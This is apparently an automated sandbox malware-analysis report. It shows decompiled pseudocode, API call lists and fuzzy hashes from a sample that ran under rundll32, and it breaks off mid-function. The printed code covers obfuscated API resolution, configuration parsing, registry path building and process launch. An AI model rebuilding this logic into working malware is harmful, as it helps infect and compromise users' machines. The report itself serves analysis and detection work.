                                          C-Code - Quality: 56%
                                          			E043530FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0x435d33c; // 0x6879bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E04359810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0x435c19c;
                                          				}
                                          				_t44 = E043547E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E043558BE(lstrlenW(0x435eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x435eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
                                          						_t75 =  *0x435d2a4; // 0x251a5a8
                                          						_t73 =  *0x435d11c; // 0x435abc9
                                          						_t18 = _t75 + 0x435eb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E043558BE(lstrlenW(0x435ec58) + _a8 + _t57 + _t58 + lstrlenW(0x435ec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E0435147E(_v16);
                                          						} else {
                                          							_t64 =  *0x435d2a4; // 0x251a5a8
                                          							_t31 = _t64 + 0x435ec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E0435147E(_v8);
                                          				}
                                          				return _v20;
                                          			}


                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04353111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 0435314C
                                          • lstrlen.KERNEL32(?), ref: 04353155
                                          • lstrlen.KERNEL32(00000000), ref: 0435315C
                                          • lstrlenW.KERNEL32(80000002), ref: 0435316A
                                          • lstrlenW.KERNEL32(0435EB38), ref: 04353173
                                          • lstrlen.KERNEL32(?), ref: 043531B7
                                          • lstrlen.KERNEL32(?), ref: 043531BF
                                          • lstrlenW.KERNEL32(?), ref: 043531CA
                                          • lstrlenW.KERNEL32(0435EC58), ref: 043531D3
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E04351493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E043557D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0x435d260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0x435d2a4; // 0x251a5a8
                                          					_t18 = _t46 + 0x435e3e6; // 0x73797325
                                          					_t66 = E043577E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0x435d2a4; // 0x251a5a8
                                          						_t19 = _t49 + 0x435e747; // 0x6878cef
                                          						_t20 = _t49 + 0x435e0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E0435684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E0435684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x435d238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E0435147E(_t68);
                                          				goto L12;
                                          			}




















                                          APIs
                                            • Part of subcall function 043557D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,043514AF,?,?,?,?,00000000,00000000), ref: 043557FD
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0435581F
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04355835
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0435584B
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04355861
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04355877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 043514C5
                                          • memset.NTDLL ref: 04351500
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0435333A,73797325), ref: 043577F7
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04357811
                                          • GetModuleHandleA.KERNEL32(4E52454B,06878CEF,73797325), ref: 04351536
                                          • GetProcAddress.KERNEL32(00000000), ref: 0435153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 043515A5
                                            • Part of subcall function 0435684E: GetProcAddress.KERNEL32(36776F57,0435935F), ref: 04356869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04351582
                                          • CloseHandle.KERNEL32(?), ref: 04351587
                                          • GetLastError.KERNEL32(00000001), ref: 0435158B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 6091b296c40c648f875a0d646273937bcbd84cbab3872c70a3e672b40b82d10a
                                          • Instruction ID: f56d369983625c27638c94e6831bdf5dfbfbb77771c3472b1e1ebda9d8b4aa52
                                          • Opcode Fuzzy Hash: 6091b296c40c648f875a0d646273937bcbd84cbab3872c70a3e672b40b82d10a
                                          • Instruction Fuzzy Hash: 003110B6D00208AFDF11AFA4DC89EAEBBBCEF08344F105565EA06A7121D775AE44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E04354D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x435d2a4; // 0x251a5a8
                                          				_t1 = _t9 + 0x435e62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E04356027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E043558BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E04356F33(_t34, _t41, _a8);
                                          						E0435147E(_t41);
                                          						_t42 = E04354759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E0435147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E04354858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E0435147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E0435147E(_t28);
                                          				}
                                          				return _t36;
                                          			}















                                          APIs
                                            • Part of subcall function 04356027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04354D46,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?), ref: 0435608E
                                            • Part of subcall function 04356027: sprintf.NTDLL ref: 043560AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?,068795B0), ref: 04354D57
                                          • lstrlen.KERNEL32(?,?,?,043552FE,?,068795B0), ref: 04354D5F
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • strcpy.NTDLL ref: 04354D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04354D81
                                            • Part of subcall function 04356F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04354D90,00000000,?,?,?,043552FE,?,068795B0), ref: 04356F4A
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,043552FE,?,068795B0), ref: 04354D9E
                                            • Part of subcall function 04354759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04354DAA,00000000,?,?,043552FE,?,068795B0), ref: 04354763
                                            • Part of subcall function 04354759: _snprintf.NTDLL ref: 043547C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 1f9ac2a1281af30b9781132deb59c325c744abeead5e68f1b744672061caf5ce
                                          • Instruction ID: 492522963682976e2b3a9511022cc2699577064366e35e5fdfe2ff37e585fe59
                                          • Opcode Fuzzy Hash: 1f9ac2a1281af30b9781132deb59c325c744abeead5e68f1b744672061caf5ce
                                          • Instruction Fuzzy Hash: 9011C673A01225775A167BF89C44D7F3AADDE496687157115FD04AB120CE38FD4287A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E043598F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0x435d2a0; // 0x59935a40
                                          				if(E043596D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0x435d2d0 = _v12;
                                          				}
                                          				_t23 =  *0x435d2a0; // 0x59935a40
                                          				if(E043596D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0x435d2a0; // 0x59935a40
                                          						_t29 = E043510CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0x435d240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0x435d2a0; // 0x59935a40
                                          						_t30 = E043510CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0x435d244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0x435d2a0; // 0x59935a40
                                          						_t31 = E043510CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0x435d248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0x435d2a0; // 0x59935a40
                                          						_t32 = E043510CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0x435d004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0x435d2a0; // 0x59935a40
                                          						_t33 = E043510CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0x435d02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0x435d2a0; // 0x59935a40
                                          						_t34 = E043510CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E0435A2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E04359B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0x435d2a0; // 0x59935a40
                                          						_t35 = E043510CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E0435A2EF(0, _t35) != 0) {
                                          						_t86 =  *0x435d324; // 0x68795b0
                                          						E04354C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0x435d238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}






























                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 0435997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 043599AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 043599DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 04359A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 04359A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 04359AC3
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 841eb0cbf1c6860047b725ee96f52a9f0796953476541015af369f7161cb62ff
                                          • Instruction ID: 6384d66d0ac7126d8c2fb334adaa2ae197fe8e850ac01688735b0a51f80e985b
                                          • Opcode Fuzzy Hash: 841eb0cbf1c6860047b725ee96f52a9f0796953476541015af369f7161cb62ff
                                          • Instruction Fuzzy Hash: 1C519FB0B10254EEEB10EAB8ED88E6B72EDEF8C714B647915AC01D7118FA74FD408621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 043513B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 043513C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 043513DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04351443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04351452
                                          • SysFreeString.OLEAUT32(00000000), ref: 0435145D
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: f399240b21f69fba72aed33b12e7173330e19fe5c1ef164a3578461d5901b3ce
                                          • Instruction ID: 9d44c7ff8cf1e902ff1d773bcf0c0160383e0195b16560e51336ff572f48a9dd
                                          • Opcode Fuzzy Hash: f399240b21f69fba72aed33b12e7173330e19fe5c1ef164a3578461d5901b3ce
                                          • Instruction Fuzzy Hash: BC415E76D00609ABDF01EFF8D844AAEB7B9EF49304F246425ED14EB120DA71ED05CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E043557D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E043558BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x435d2a4; // 0x251a5a8
                                          					_t1 = _t23 + 0x435e11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x435d2a4; // 0x251a5a8
                                          					_t2 = _t26 + 0x435e769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E0435147E(_t54);
                                          					} else {
                                          						_t30 =  *0x435d2a4; // 0x251a5a8
                                          						_t5 = _t30 + 0x435e756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x435d2a4; // 0x251a5a8
                                          							_t7 = _t33 + 0x435e40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x435d2a4; // 0x251a5a8
                                          								_t9 = _t36 + 0x435e4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x435d2a4; // 0x251a5a8
                                          									_t11 = _t39 + 0x435e779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E04357B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}



















                                          APIs
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,043514AF,?,?,?,?,00000000,00000000), ref: 043557FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0435581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04355835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0435584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04355861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04355877
                                            • Part of subcall function 04357B01: memset.NTDLL ref: 04357B80
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 33d3171bd4ea9e0098c870f91a02c95dfc5602bf77b43783474e51928a905df1
                                          • Instruction ID: ae241d6d30213696c288c6e9c89e399cf914c40ef2be79c61a5477d802598a1d
                                          • Opcode Fuzzy Hash: 33d3171bd4ea9e0098c870f91a02c95dfc5602bf77b43783474e51928a905df1
                                          • Instruction Fuzzy Hash: 8C2171B1B0070AEFEB11DF69D844D6AB7ECEF44314B05A425ED09DB260EB74FA058B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0435A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0x435d33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E0435A5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E0435621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E0435147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0x435d2a4; // 0x251a5a8
                                          					_t16 = _t65 + 0x435e8de; // 0x65696c43
                                          					_t68 = E0435A5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d0435c0
                                          						if(E04354C9A( *_t33, _t96, _a8,  *0x435d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0x435d2a4; // 0x251a5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0x435ea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0x435ea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E043530FC( &_a24, _t73,  *0x435d334,  *0x435d338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0x435d2a4; // 0x251a5a8
                                          									_t44 = _t75 + 0x435e856; // 0x74666f53
                                          									_t78 = E0435A5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d0435c0
                                          										E04351BC1( *_t47, _t96, _a8,  *0x435d338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d0435c0
                                          										E04351BC1( *_t49, _t96, _t103,  *0x435d330, _a16);
                                          										E0435147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d0435c0
                                          									E04351BC1( *_t40, _t96, _a8,  *0x435d338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d0435c0
                                          									E04351BC1( *_t43, _t96, _a8,  *0x435d330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E0435147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d0435c0
